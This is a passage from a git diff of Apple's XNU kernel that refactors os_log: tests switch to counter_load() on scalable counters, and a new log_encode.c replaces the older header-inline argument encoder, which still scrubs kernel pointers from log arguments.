"mat%llu", checksum, uniqid, seqno, total_seqno, a); - T_EXPECT_GE_UINT((oslog_p_total_msgcount - total_msg), 1, "total message count in buffer"); + T_EXPECT_GE_UINT((counter_load(&oslog_p_total_msgcount) - total_msg), 1, "total message count in buffer"); datalen = scnprintf(databuffer, sizeof(databuffer), "kernel^0^test^oslog_info#mat%llu", a); match_count = find_pattern_in_buffer(databuffer, datalen, total_seqno); T_EXPECT_EQ_ULONG(match_count, total_seqno, "verify oslog_info does not go to systemlog buffer"); - total_msg = oslog_p_total_msgcount; + total_msg = counter_load(&oslog_p_total_msgcount); test_oslog_info_helper(uniqid, 10); - T_EXPECT_GE_UINT(oslog_p_total_msgcount - total_msg, 10, "test_oslog_info_helper: Should have seen 10 msgs"); + T_EXPECT_GE_UINT(counter_load(&oslog_p_total_msgcount) - total_msg, 10, "test_oslog_info_helper: Should have seen 10 msgs"); - total_msg = oslog_p_total_msgcount; + total_msg = counter_load(&oslog_p_total_msgcount); test_oslog_debug_helper(uniqid, 10); - T_EXPECT_GE_UINT(oslog_p_total_msgcount - total_msg, 10, "test_oslog_debug_helper:Should have seen 10 msgs"); + T_EXPECT_GE_UINT(counter_load(&oslog_p_total_msgcount) - total_msg, 10, "test_oslog_debug_helper:Should have seen 10 msgs"); - total_msg = oslog_p_total_msgcount; + total_msg = counter_load(&oslog_p_total_msgcount); test_oslog_error_helper(uniqid, 10); - T_EXPECT_GE_UINT(oslog_p_total_msgcount - total_msg, 10, "test_oslog_error_helper:Should have seen 10 msgs"); + T_EXPECT_GE_UINT(counter_load(&oslog_p_total_msgcount) - total_msg, 10, "test_oslog_error_helper:Should have seen 10 msgs"); - total_msg = oslog_p_total_msgcount; + total_msg = counter_load(&oslog_p_total_msgcount); test_oslog_default_helper(uniqid, 10); - T_EXPECT_GE_UINT(oslog_p_total_msgcount - total_msg, 10, "test_oslog_default_helper:Should have seen 10 msgs"); + T_EXPECT_GE_UINT(counter_load(&oslog_p_total_msgcount) - total_msg, 10, "test_oslog_default_helper:Should have seen 10 msgs"); - total_msg = oslog_p_total_msgcount; + total_msg = counter_load(&oslog_p_total_msgcount); test_oslog_fault_helper(uniqid, 10); - T_EXPECT_GE_UINT(oslog_p_total_msgcount - total_msg, 10, "test_oslog_fault_helper:Should have seen 10 msgs"); + T_EXPECT_GE_UINT(counter_load(&oslog_p_total_msgcount) - total_msg, 10, "test_oslog_fault_helper:Should have seen 10 msgs"); - T_LOG("oslog internal counters total %u , saved %u, dropped %u", oslog_p_total_msgcount, oslog_p_saved_msgcount, - oslog_p_dropped_msgcount); + T_LOG("oslog internal counters total %u , saved %u, dropped %u", counter_load(&oslog_p_total_msgcount), counter_load(&oslog_p_saved_msgcount), + counter_load(&oslog_p_dropped_msgcount)); return KERN_SUCCESS; } @@ -945,8 +872,8 @@ test_os_log_parallel(void) kern_return_t kr; uint32_t uniqid = RandomULong(); - printf("oslog internal counters total %u , saved %u, dropped %u", oslog_p_total_msgcount, oslog_p_saved_msgcount, - oslog_p_dropped_msgcount); + printf("oslog internal counters total %lld , saved %lld, dropped %lld", counter_load(&oslog_p_total_msgcount), counter_load(&oslog_p_saved_msgcount), + counter_load(&oslog_p_dropped_msgcount)); kr = kernel_thread_start(_test_log_loop, NULL, &thread[0]); T_ASSERT_EQ_INT(kr, KERN_SUCCESS, "kernel_thread_start returned successfully"); @@ -964,8 +891,8 @@ test_os_log_parallel(void) thread_deallocate(thread[0]); thread_deallocate(thread[1]); - T_LOG("oslog internal counters total %u , saved %u, dropped %u", oslog_p_total_msgcount, oslog_p_saved_msgcount, - oslog_p_dropped_msgcount); + T_LOG("oslog internal counters total %lld , saved %lld, dropped %lld", counter_load(&oslog_p_total_msgcount), counter_load(&oslog_p_saved_msgcount), + counter_load(&oslog_p_dropped_msgcount)); T_PASS("parallel_logging tests is now complete"); return KERN_SUCCESS; @@ -981,9 +908,9 @@ test_oslog_handleOSLogCtl(int32_t * in, int32_t * out, int32_t len) case 1: { /* send out counters */ - out[1] = oslog_p_total_msgcount; - out[2] = oslog_p_saved_msgcount; - out[3] = oslog_p_dropped_msgcount; + out[1] = counter_load(&oslog_p_total_msgcount); + out[2] = counter_load(&oslog_p_saved_msgcount); + out[3] = counter_load(&oslog_p_dropped_msgcount); out[0] = KERN_SUCCESS; break; } @@ -1035,16 +962,16 @@ kern_return_t test_stresslog_dropmsg(uint32_t uniqid) { uint32_t total, saved, dropped; - total = oslog_p_total_msgcount; - saved = oslog_p_saved_msgcount; - dropped = oslog_p_dropped_msgcount; + total = counter_load(&oslog_p_total_msgcount); + saved = counter_load(&oslog_p_saved_msgcount); + dropped = counter_load(&oslog_p_dropped_msgcount); uniqid = RandomULong(); test_oslog_debug_helper(uniqid, 100); - while ((oslog_p_dropped_msgcount - dropped) == 0) { + while ((counter_load(&oslog_p_dropped_msgcount) - dropped) == 0) { test_oslog_debug_helper(uniqid, 100); } - printf("test_stresslog_dropmsg: logged %u msgs, saved %u and caused a drop of %u msgs. \n", oslog_p_total_msgcount - total, - oslog_p_saved_msgcount - saved, oslog_p_dropped_msgcount - dropped); + printf("test_stresslog_dropmsg: logged %lld msgs, saved %lld and caused a drop of %lld msgs. \n", counter_load(&oslog_p_total_msgcount) - total, + counter_load(&oslog_p_saved_msgcount) - saved, counter_load(&oslog_p_dropped_msgcount) - dropped); return KERN_SUCCESS; } diff --git a/libkern/os/log_encode.c b/libkern/os/log_encode.c new file mode 100644 index 000000000..5c2e2e976 --- /dev/null +++ b/libkern/os/log_encode.c @@ -0,0 +1,603 @@ +/* + * Copyright (c) 2015-2020 Apple Inc. All rights reserved. + * + * @APPLE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this + * file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. + * + * @APPLE_LICENSE_HEADER_END@ + */ + +#include +#include +#include +#include +#include +#include +#include + +#if __has_feature(ptrauth_calls) +#include +#include +#endif /* __has_feature(ptrauth_calls) */ + +#include "log_encode.h" +#include "log_mem.h" + +#define isdigit(ch) (((ch) >= '0') && ((ch) <= '9')) +#define log_context_cursor(ctx) &(ctx)->ctx_hdr->hdr_data[(ctx)->ctx_content_off] + +extern boolean_t doprnt_hide_pointers; + +SCALABLE_COUNTER_DEFINE(oslog_p_fmt_invalid_msgcount); +SCALABLE_COUNTER_DEFINE(oslog_p_fmt_max_args_msgcount); +SCALABLE_COUNTER_DEFINE(oslog_p_truncated_msgcount); + +static bool +is_kernel_pointer(void *arg, size_t arg_len) +{ + if (arg_len < sizeof(void *)) { + return false; + } + + unsigned long long value = 0; + assert(arg_len <= sizeof(value)); + (void) memcpy(&value, arg, arg_len); + +#if __has_feature(ptrauth_calls) + /** + * Strip out the pointer authentication code before + * checking whether the pointer is a kernel address. + */ + value = (unsigned long long)VM_KERNEL_STRIP_PTR(value); +#endif /* __has_feature(ptrauth_calls) */ + + return value >= VM_MIN_KERNEL_AND_KEXT_ADDRESS && value <= VM_MAX_KERNEL_ADDRESS; +} + +static void +log_context_cursor_advance(os_log_context_t ctx, size_t amount) +{ + ctx->ctx_content_off += amount; + assert(log_context_cursor(ctx) <= (ctx->ctx_buffer + ctx->ctx_buffer_sz)); +} + +static bool +log_fits(os_log_context_t ctx, size_t data_size) +{ + return (ctx->ctx_content_off + data_size) <= ctx->ctx_content_sz; +} + +static bool +log_fits_cmd(os_log_context_t ctx, size_t data_size) +{ + return log_fits(ctx, sizeof(*ctx->ctx_hdr) + data_size); +} + +static void +log_range_update(os_log_fmt_range_t range, uint16_t offset, uint16_t length) +{ + range->offset = offset; + /* + * Truncated flag may have already been set earlier, hence do not + * overwrite it blindly. + */ + if (length < range->length) { + range->truncated = true; + } + range->length = length; +} + +/* + * Stores a command in the main section. The value itself is wrapped in + * the os_log_fmt_cmd_t struct. + */ +static void +log_add_cmd(os_log_context_t ctx, os_log_fmt_cmd_type_t type, uint8_t flags, + void *arg, size_t arg_size) +{ + os_log_fmt_cmd_t cmd; + const size_t cmd_sz = sizeof(*cmd) + arg_size; + + assert(log_fits_cmd(ctx, cmd_sz)); + assert(arg_size <= UINT8_MAX); + + cmd = (os_log_fmt_cmd_t)log_context_cursor(ctx); + cmd->cmd_type = type; + cmd->cmd_flags = flags; + cmd->cmd_size = (uint8_t)arg_size; + (void) memcpy(cmd->cmd_data, arg, cmd->cmd_size); + + assert(cmd_sz == sizeof(*cmd) + cmd->cmd_size); + log_context_cursor_advance(ctx, cmd_sz); +} + +/* + * Collect details about argument which needs to be stored in the pubdata + * section. + */ +static void +log_collect_public_range_data(os_log_context_t ctx, os_log_fmt_range_t range, void *arg) +{ + ctx->ctx_pubdata[ctx->ctx_pubdata_cnt++] = (char *)arg; + ctx->ctx_pubdata_sz += range->length; +} + +static void +log_add_range_data(os_log_context_t ctx, os_log_fmt_range_t range, void *arg) +{ + assert(log_fits(ctx, range->length)); + (void) memcpy(log_context_cursor(ctx), arg, range->length); + log_context_cursor_advance(ctx, range->length); +} + +static struct os_log_fmt_range_s +log_create_range(os_log_context_t ctx, size_t arg_len) +{ + const size_t final_arg_len = MIN(arg_len, UINT16_MAX); + + return (struct os_log_fmt_range_s) { + .offset = ctx->ctx_pubdata_sz, + .length = (uint16_t)final_arg_len, + .truncated = (final_arg_len < arg_len) + }; +} + +static int +log_add_range_arg(os_log_context_t ctx, os_log_fmt_cmd_type_t type, os_log_fmt_cmd_flags_t flags, + void *arg, size_t arg_len) +{ + struct os_log_fmt_range_s range; + + if (!log_fits_cmd(ctx, sizeof(range))) { + return ENOMEM; + } + + range = log_create_range(ctx, arg_len); + + if (flags == OSLF_CMD_FLAG_PUBLIC) { + if (ctx->ctx_pubdata_cnt == OS_LOG_MAX_PUB_ARGS) { + return ENOMEM; + } + assert(ctx->ctx_pubdata_cnt < OS_LOG_MAX_PUB_ARGS); + log_collect_public_range_data(ctx, &range, arg); + } + log_add_cmd(ctx, type, flags, &range, sizeof(range)); + ctx->ctx_hdr->hdr_cmd_cnt++; + + return 0; +} + +/* + * Adds a scalar argument value to the main section. + */ +static int +log_add_arg(os_log_context_t ctx, os_log_fmt_cmd_type_t type, void *arg, size_t arg_len) +{ + assert(type == OSLF_CMD_TYPE_COUNT || type == OSLF_CMD_TYPE_SCALAR); + assert(arg_len < UINT16_MAX); + + if (log_fits_cmd(ctx, arg_len)) { + log_add_cmd(ctx, type, OSLF_CMD_FLAG_PUBLIC, arg, arg_len); + ctx->ctx_hdr->hdr_cmd_cnt++; + return 0; + } + + return ENOMEM; +} + +static void +log_encode_public_data(os_log_context_t ctx) +{ + const uint16_t orig_content_off = ctx->ctx_content_off; + os_log_fmt_hdr_t const hdr = ctx->ctx_hdr; + os_log_fmt_cmd_t cmd = (os_log_fmt_cmd_t)hdr->hdr_data; + + assert(ctx->ctx_pubdata_cnt <= hdr->hdr_cmd_cnt); + + for (int i = 0, pub_i = 0; i < hdr->hdr_cmd_cnt; i++, cmd = (os_log_fmt_cmd_t)(cmd->cmd_data + cmd->cmd_size)) { + if (cmd->cmd_type != OSLF_CMD_TYPE_STRING) { + continue; + } + + os_log_fmt_range_t const range __attribute__((aligned(8))) = (os_log_fmt_range_t)&cmd->cmd_data; + + // Fix offset and length of the argument data in the hdr. + log_range_update(range, ctx->ctx_content_off - orig_content_off, + MIN(range->length, ctx->ctx_content_sz - ctx->ctx_content_off)); + + if (range->truncated) { + ctx->ctx_truncated = true; + } + + assert(pub_i < ctx->ctx_pubdata_cnt); + log_add_range_data(ctx, range, ctx->ctx_pubdata[pub_i++]); + } +} + +static bool +log_expand(os_log_context_t ctx, size_t new_size) +{ + assert(new_size > ctx->ctx_buffer_sz); + + if (!oslog_is_safe()) { + return false; + } + + size_t final_size = new_size; + + void *buf = logmem_alloc(ctx->ctx_logmem, &final_size); + if (!buf) { + return false; + } + assert(final_size >= new_size); + + // address length header + already stored data + const size_t hdr_size = (uint8_t *)ctx->ctx_hdr - ctx->ctx_buffer; + const size_t copy_size = hdr_size + sizeof(*ctx->ctx_hdr) + ctx->ctx_content_sz; + assert(copy_size <= new_size); + (void) memcpy(buf, ctx->ctx_buffer, copy_size); + + if (ctx->ctx_allocated) { + logmem_free(ctx->ctx_logmem, ctx->ctx_buffer, ctx->ctx_buffer_sz); + } + + ctx->ctx_buffer = buf; + ctx->ctx_buffer_sz = final_size; + ctx->ctx_content_sz = (uint16_t)(ctx->ctx_buffer_sz - hdr_size - sizeof(*ctx->ctx_hdr)); + ctx->ctx_hdr = (os_log_fmt_hdr_t)&ctx->ctx_buffer[hdr_size]; + ctx->ctx_allocated = true; + + return true; +} + +static int +log_encode_fmt_arg(void *arg, size_t arg_len, os_log_fmt_cmd_type_t type, os_log_context_t ctx) +{ + int rc = 0; + + switch (type) { + case OSLF_CMD_TYPE_COUNT: + case OSLF_CMD_TYPE_SCALAR: + // Scrub kernel pointers. + if (doprnt_hide_pointers && is_kernel_pointer(arg, arg_len)) { + rc = log_add_range_arg(ctx, type, OSLF_CMD_FLAG_PRIVATE, NULL, 0); + ctx->ctx_hdr->hdr_flags |= OSLF_HDR_FLAG_HAS_PRIVATE; + } else { + rc = log_add_arg(ctx, type, arg, arg_len); + } + break; + case OSLF_CMD_TYPE_STRING: + rc = log_add_range_arg(ctx, type, OSLF_CMD_FLAG_PUBLIC, arg, arg_len); + ctx->ctx_hdr->hdr_flags |= OSLF_HDR_FLAG_HAS_NON_SCALAR; + break; + default: + panic("Unsupported log value type"); + } + + return rc; +} + +static int +log_encode_fmt(os_log_context_t ctx, const char *format, va_list args) +{ + const char *percent = strchr(format, '%'); + + while (percent != NULL) { + ++percent; + + if (percent[0] == '%') { + percent = strchr(percent + 1, '%'); // Find next format after %% + continue; + } + + struct os_log_format_value_s value; + int type = OST_INT; + int prec = 0; + char ch; + + for (bool done = false; !done; percent++) { + int err = 0; + + switch (ch = percent[0]) { + /* type of types or other */ + case 'l': // longer + type++; + break; + + case 'h': // shorter + type--; + break; + + case 'z': + type = OST_SIZE; + break; + + case 'j': + type = OST_INTMAX; + break; + + case 't': + type = OST_PTRDIFF; + break; + + case 'q': + type = OST_LONGLONG; + break; + + case '.': // precision + if ((percent[1]) == '*') { + prec = va_arg(args, int); + err = log_encode_fmt_arg(&prec, sizeof(prec), OSLF_CMD_TYPE_COUNT, ctx); + if (slowpath(err)) { + return err; + } + percent++; + continue; + } else { + // we have to read the precision and do the right thing + const char *fmt = percent + 1; + prec = 0; + while (isdigit(ch = *fmt++)) { + prec = 10 * prec + (ch - '0'); + } + + if (prec > 1024) { + prec = 1024; + } + + err = log_encode_fmt_arg(&prec, sizeof(prec), OSLF_CMD_TYPE_COUNT, ctx); + } + break; + + case '-': // left-align + case '+': // force sign + case ' ': // prefix non-negative with space + case '#': // alternate + case '\'': // group by thousands + break; + + /* fixed types */ + case 'd': // integer + case 'i': // integer + case 'o': // octal + case 'u': // unsigned + case 'x': // hex + case 'X': // upper-hex + switch (type) { + case OST_CHAR: + value.type.ch = (char) va_arg(args, int); + err = log_encode_fmt_arg(&value.type.ch, sizeof(value.type.ch), OSLF_CMD_TYPE_SCALAR, ctx); + break; + + case OST_SHORT: + value.type.s = (short) va_arg(args, int); + err = log_encode_fmt_arg(&value.type.s, sizeof(value.type.s), OSLF_CMD_TYPE_SCALAR, ctx); + break; + + case OST_INT: + value.type.i = va_arg(args, int); + err = log_encode_fmt_arg(&value.type.i, sizeof(value.type.i), OSLF_CMD_TYPE_SCALAR, ctx); + break; + + case OST_LONG: + value.type.l = va_arg(args, long); + err = log_encode_fmt_arg(&value.type.l, sizeof(value.type.l), OSLF_CMD_TYPE_SCALAR, ctx); + break; + + case OST_LONGLONG: + value.type.ll = va_arg(args, long long); + err = log_encode_fmt_arg(&value.type.ll, sizeof(value.type.ll), OSLF_CMD_TYPE_SCALAR, ctx); + break; + + case OST_SIZE: + value.type.z = va_arg(args, size_t); + err = log_encode_fmt_arg(&value.type.z, sizeof(value.type.z), OSLF_CMD_TYPE_SCALAR, ctx); + break; + + case OST_INTMAX: + value.type.im = va_arg(args, intmax_t); + err = log_encode_fmt_arg(&value.type.im, sizeof(value.type.im), OSLF_CMD_TYPE_SCALAR, ctx); + break; + + case OST_PTRDIFF: + value.type.pd = va_arg(args, ptrdiff_t); + err = log_encode_fmt_arg(&value.type.pd, sizeof(value.type.pd), OSLF_CMD_TYPE_SCALAR, ctx); + break; + + default: + return EINVAL; + } + done = true; + break; + + case 'p': // pointer + value.type.p = va_arg(args, void *); + err = log_encode_fmt_arg(&value.type.p, sizeof(value.type.p), OSLF_CMD_TYPE_SCALAR, ctx); + done = true; + break; + + case 'c': // char + value.type.ch = (char) va_arg(args, int); + err = log_encode_fmt_arg(&value.type.ch, sizeof(value.type.ch), OSLF_CMD_TYPE_SCALAR, ctx); + done = true; + break; + + case 's': // string + value.type.pch = va_arg(args, char *); + if (prec == 0 && value.type.pch) { + prec = (int) strlen(value.type.pch) + 1; + } + err = log_encode_fmt_arg(value.type.pch, prec, OSLF_CMD_TYPE_STRING, ctx); + prec = 0; + done = true; + break; + + case 'm': + value.type.i = 0; // Does %m make sense in the kernel? + err = log_encode_fmt_arg(&value.type.i, sizeof(value.type.i), OSLF_CMD_TYPE_SCALAR, ctx); + done = true; + break; + + default: + if (isdigit(ch)) { // [0-9] + continue; + } + return EINVAL; + } + + if (slowpath(err)) { + return err; + } + + if (done) { + percent = strchr(percent, '%'); // Find next format + break; + } + } + } + + return 0; +} + +static inline size_t +write_address_location(uint8_t buf[static sizeof(uint64_t)], + void *dso, const void *address, firehose_tracepoint_flags_t *flags, bool driverKit) +{ + uintptr_t shift_addr = (uintptr_t)address - (uintptr_t)dso; + + kc_format_t kcformat = KCFormatUnknown; + __assert_only bool result = PE_get_primary_kc_format(&kcformat); + assert(result); + + if (kcformat == KCFormatStatic || kcformat == KCFormatKCGEN) { + *flags = _firehose_tracepoint_flags_pc_style_shared_cache; + memcpy(buf, (uint32_t[]){ (uint32_t)shift_addr }, sizeof(uint32_t)); + return sizeof(uint32_t); + } + + /* + * driverKit will have the dso set as MH_EXECUTE (it is logging from a + * syscall in the kernel) but needs logd to parse the address as an + * absolute pc. + */ + kernel_mach_header_t *mh = dso; + if (mh->filetype == MH_EXECUTE && !driverKit) { + *flags = _firehose_tracepoint_flags_pc_style_main_exe; + memcpy(buf, (uint32_t[]){ (uint32_t)shift_addr }, sizeof(uint32_t)); + return sizeof(uint32_t); + } + + *flags = _firehose_tracepoint_flags_pc_style_absolute; + shift_addr = driverKit ? (uintptr_t)address : VM_KERNEL_UNSLIDE(address); + size_t len = sizeof(uintptr_t); + +#if __LP64__ + len = 6; // 48 bits are enough +#endif + memcpy(buf, (uintptr_t[]){ shift_addr }, len); + + return len; +} + +static void +os_log_encode_location(os_log_context_t ctx, void *addr, void *dso, bool driverKit, + firehose_tracepoint_flags_t *ft_flags) +{ + const size_t hdr_size = write_address_location(ctx->ctx_buffer, dso, addr, ft_flags, driverKit); + ctx->ctx_hdr = (os_log_fmt_hdr_t)&ctx->ctx_buffer[hdr_size]; + ctx->ctx_content_sz = (uint16_t)(ctx->ctx_buffer_sz - hdr_size - sizeof(*ctx->ctx_hdr)); +} + +/* + * Encodes argument (meta)data into a format consumed by libtrace. Stores + * metadada for all arguments first. Metadata also include scalar argument + * values. Second step saves data which are encoded separately from respective + * metadata (like strings). + */ +bool +os_log_context_encode(os_log_context_t ctx, const char *fmt, va_list args, void *addr, void *dso, bool driverKit) +{ + os_log_encode_location(ctx, addr, dso, driverKit, &ctx->ctx_ft_flags); + + va_list args_copy; + va_copy(args_copy, args); + + int rc = log_encode_fmt(ctx, fmt, args); + + va_end(args_copy); + + switch (rc) { + case EINVAL: + // Bogus/Unsupported fmt string + counter_inc(&oslog_p_fmt_invalid_msgcount); + return false; + case ENOMEM: + /* + * The fmt contains unreasonable number of arguments (> 32) and + * we ran out of space. We could call log_expand() + * here and retry. However, using such formatting strings rather + * seem like a misuse of the logging system, hence error. + */ + counter_inc(&oslog_p_fmt_max_args_msgcount); + return false; + case 0: + break; + default: + panic("unhandled return value"); + } + + if (ctx->ctx_pubdata_sz == 0) { + goto finish; + } + + if (!log_fits(ctx, ctx->ctx_pubdata_sz)) { + size_t space_needed = log_context_cursor(ctx) + ctx->ctx_pubdata_sz - ctx->ctx_buffer; + space_needed = MIN(space_needed, logmem_max_size(ctx->ctx_logmem)); + (void) log_expand(ctx, space_needed); + } + + log_encode_public_data(ctx); + + if (ctx->ctx_truncated) { + counter_inc(&oslog_p_truncated_msgcount); + } +finish: + ctx->ctx_content_sz = (uint16_t)(log_context_cursor(ctx) - ctx->ctx_buffer); + ctx->ctx_content_off = 0; + return true; +} + +void +os_log_context_init(os_log_context_t ctx, logmem_t *logmem, uint8_t *buffer, size_t buffer_sz) +{ + assert(logmem); + assert(buffer); + assert(buffer_sz > 0); + + bzero(ctx, sizeof(*ctx)); + ctx->ctx_logmem = logmem; + ctx->ctx_buffer = buffer; + ctx->ctx_buffer_sz = buffer_sz; +} + +void +os_log_context_free(os_log_context_t ctx) +{ + if (ctx->ctx_allocated) { + logmem_free(ctx->ctx_logmem, ctx->ctx_buffer, ctx->ctx_buffer_sz); + } +} diff --git a/libkern/os/log_encode.h b/libkern/os/log_encode.h index 82f2ac21d..40be98626 100644 --- a/libkern/os/log_encode.h +++ b/libkern/os/log_encode.h @@ -1,5 +1,5 @@ /* - * Copyright (c) 2015-2016 Apple Inc. All rights reserved. + * Copyright (c) 2015-2020 Apple Inc. All rights reserved. * * @APPLE_LICENSE_HEADER_START@ * @@ -25,507 +25,9 @@ #define log_encode_h #include "log_encode_types.h" -#include -#if __has_feature(ptrauth_calls) -#include -#include -#endif /* __has_feature(ptrauth_calls) */ - -#ifdef KERNEL -#define isdigit(ch) (((ch) >= '0') && ((ch) <= '9')) -extern boolean_t doprnt_hide_pointers; -#endif - -static bool -_encode_data(os_log_buffer_value_t content, const void *arg, size_t arg_len, os_log_buffer_context_t context) -{ - struct os_log_arginfo_s arginfo; - void *databuf; - - arg_len = MIN(arg_len, UINT16_MAX); - - if (content->flags & OS_LOG_CONTENT_FLAG_PRIVATE) { - databuf = context->privdata + context->privdata_off; - arginfo.length = MIN((uint16_t)arg_len, (context->privdata_sz - context->privdata_off)); - arginfo.offset = context->privdata_off; - } else { - databuf = context->pubdata + context->pubdata_off; - arginfo.length = MIN((uint16_t)arg_len, (context->pubdata_sz - context->pubdata_off)); - arginfo.offset = context->pubdata_off; - } - - if (context->arg_content_sz > 0) { - arginfo.length = MIN((uint16_t)context->arg_content_sz, arginfo.length); - } - - memcpy(content->value, &arginfo, sizeof(arginfo)); - content->size = sizeof(arginfo); - - if (arginfo.length) { - if (content->type == OS_LOG_BUFFER_VALUE_TYPE_STRING -#ifndef KERNEL - || content->type == OS_LOG_BUFFER_VALUE_TYPE_OBJECT -#endif - ) { - strlcpy(databuf, arg, arginfo.length); - } else { - memcpy(databuf, arg, arginfo.length); - } - } - - if (content->flags & OS_LOG_CONTENT_FLAG_PRIVATE) { - context->privdata_off += arginfo.length; - } else { - context->pubdata_off += arginfo.length; - } - - context->content_off += sizeof(*content) + content->size; - context->arg_content_sz = 0; - - return true; -} - -#ifndef KERNEL -static void -_os_log_parse_annotated(char *annotated, const char **visibility, const char **library, const char **type) -{ - char *values[3] = { NULL }; - int cnt = 0; - int idx = 0; - - for (; cnt < 3;) { - char *token = strsep(&annotated, ", {}"); - if (token == NULL) { - break; - } - - if (*token == '\0') { - continue; - } - - values[cnt++] = token; - } - - if ((cnt > 0) && (!strcmp(values[0], "public") || !strcmp(values[0], "private"))) { - if (visibility != NULL) { - (*visibility) = values[0]; - } - - idx++; - } - - if (idx < cnt && (library != NULL) && (type != NULL)) { - char *decoder = values[idx]; - - for (cnt = 0; cnt < 3;) { - char *token = strsep(&decoder, ": {}"); - if (token == NULL) { - break; - } - - if (*token == '\0') { - continue; - } - - values[cnt++] = token; - } - - if (cnt == 2) { - (*library) = values[0]; - (*type) = values[1]; - } - - if (cnt == 1) { - (*library) = "builtin"; - (*type) = values[0]; - } - } -} -#endif /* !KERNEL */ - -OS_ALWAYS_INLINE -static inline bool -_os_log_encode_arg(void *arg, size_t arg_len, os_log_value_type_t ctype, bool is_private, os_log_buffer_context_t context) -{ - os_log_buffer_value_t content = (os_log_buffer_value_t) &context->buffer->content[context->content_off]; - size_t content_sz = sizeof(*content) + arg_len; - char tempString[OS_LOG_BUFFER_MAX_SIZE] = {}; -#ifndef KERNEL - bool obj_private = true; -#endif - -#ifdef KERNEL - /* scrub kernel pointers */ - if (doprnt_hide_pointers && - ctype == OS_LOG_BUFFER_VALUE_TYPE_SCALAR && - arg_len >= sizeof(void *)) { - unsigned long long value = 0; - memcpy(&value, arg, arg_len); - -#if __has_feature(ptrauth_calls) - /** - * Strip out the pointer authentication code before - * checking whether the pointer is a kernel address. - */ - value = (unsigned long long)VM_KERNEL_STRIP_PTR(value); -#endif /* __has_feature(ptrauth_calls) */ - - if (value >= VM_MIN_KERNEL_AND_KEXT_ADDRESS && value <= VM_MAX_KERNEL_ADDRESS) { - is_private = true; - bzero(arg, arg_len); - } - } -#endif - - content->type = ctype; - content->flags = (is_private ? OS_LOG_CONTENT_FLAG_PRIVATE : 0); - -#ifndef KERNEL - if (context->annotated != NULL) { - const char *visibility = NULL; - - _os_log_parse_annotated(context->annotated, &visibility, NULL, NULL); - if (visibility) { - if (!strcasecmp(visibility, "private")) { - content->flags |= OS_LOG_CONTENT_FLAG_PRIVATE; - } else if (!strcasecmp(visibility, "public")) { - content->flags &= ~OS_LOG_CONTENT_FLAG_PRIVATE; - } - } - - context->annotated = NULL; - } -#endif /* !KERNEL */ - - switch (ctype) { - case OS_LOG_BUFFER_VALUE_TYPE_COUNT: - case OS_LOG_BUFFER_VALUE_TYPE_SCALAR: - if (is_private) { - _encode_data(content, tempString, strlen(tempString) + 1, context); - } else { - if ((context->content_off + content_sz) > context->content_sz) { - return false; - } - - memcpy(content->value, arg, arg_len); - content->size = (uint8_t)arg_len; - context->content_off += content_sz; - } - break; - - case OS_LOG_BUFFER_VALUE_TYPE_STRING: - context->buffer->flags |= OS_LOG_BUFFER_HAS_NON_SCALAR; - if (_os_log_string_is_public(arg)) { - content->flags &= ~OS_LOG_CONTENT_FLAG_PRIVATE; - } - - _encode_data(content, arg, arg_len, context); - break; - -#ifndef KERNEL - case OS_LOG_BUFFER_VALUE_TYPE_POINTER: - context->buffer->flags |= OS_LOG_BUFFER_HAS_NON_SCALAR; - _encode_data(content, arg, arg_len, context); - break; - - case OS_LOG_BUFFER_VALUE_TYPE_OBJECT: - context->buffer->flags |= OS_LOG_BUFFER_HAS_NON_SCALAR; - if (!_NSCF2data(arg, tempString, sizeof(tempString), &obj_private)) { - tempString[0] = '\0'; - } - - if (!obj_private) { - content->flags &= ~OS_LOG_CONTENT_FLAG_PRIVATE; - } - - _encode_data(content, tempString, strlen(tempString) + 1, context); - break; -#endif /* !KERNEL */ - } - - if (content->flags & OS_LOG_CONTENT_FLAG_PRIVATE) { - context->buffer->flags |= OS_LOG_BUFFER_HAS_PRIVATE; - } - - context->arg_idx++; - - return true; -} - -static bool -_os_log_encode(const char *format, va_list args, int saved_errno, os_log_buffer_context_t context) -{ - const char *percent = strchr(format, '%'); -#ifndef KERNEL - char annotated[256]; -#endif - - while (percent != NULL) { - ++percent; - if (percent[0] != '%') { - struct os_log_format_value_s value; - int type = OST_INT; -#ifndef KERNEL - bool long_double = false; -#endif - int prec = 0; - char ch; - - for (bool done = false; !done; percent++) { - switch (ch = percent[0]) { - /* type of types or other */ - case 'l': // longer - type++; - break; - - case 'h': // shorter - type--; - break; - - case 'z': - type = OST_SIZE; - break; - - case 'j': - type = OST_INTMAX; - break; - - case 't': - type = OST_PTRDIFF; - break; - - case '.': // precision - if ((percent[1]) == '*') { - prec = va_arg(args, int); - _os_log_encode_arg(&prec, sizeof(prec), OS_LOG_BUFFER_VALUE_TYPE_COUNT, false, context); - percent++; - continue; - } else { - // we have to read the precision and do the right thing - const char *fmt = percent + 1; - prec = 0; - while (isdigit(ch = *fmt++)) { - prec = 10 * prec + (ch - '0'); - } - - if (prec > 1024) { - prec = 1024; - } - - _os_log_encode_arg(&prec, sizeof(prec), OS_LOG_BUFFER_VALUE_TYPE_COUNT, false, context); - } - break; - - case '-': // left-align - case '+': // force sign - case ' ': // prefix non-negative with space - case '#': // alternate - case '\'': // group by thousands - break; - - /* fixed types */ - case 'd': // integer - case 'i': // integer - case 'o': // octal - case 'u': // unsigned - case 'x': // hex - case 'X': // upper-hex - switch (type) { - case OST_CHAR: - value.type.ch = (char) va_arg(args, int); - _os_log_encode_arg(&value.type.ch, sizeof(value.type.ch), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context); - break; - - case OST_SHORT: - value.type.s = (short) va_arg(args, int); - _os_log_encode_arg(&value.type.s, sizeof(value.type.s), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context); - break; - - case OST_INT: - value.type.i = va_arg(args, int); - _os_log_encode_arg(&value.type.i, sizeof(value.type.i), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context); - break; - - case OST_LONG: - 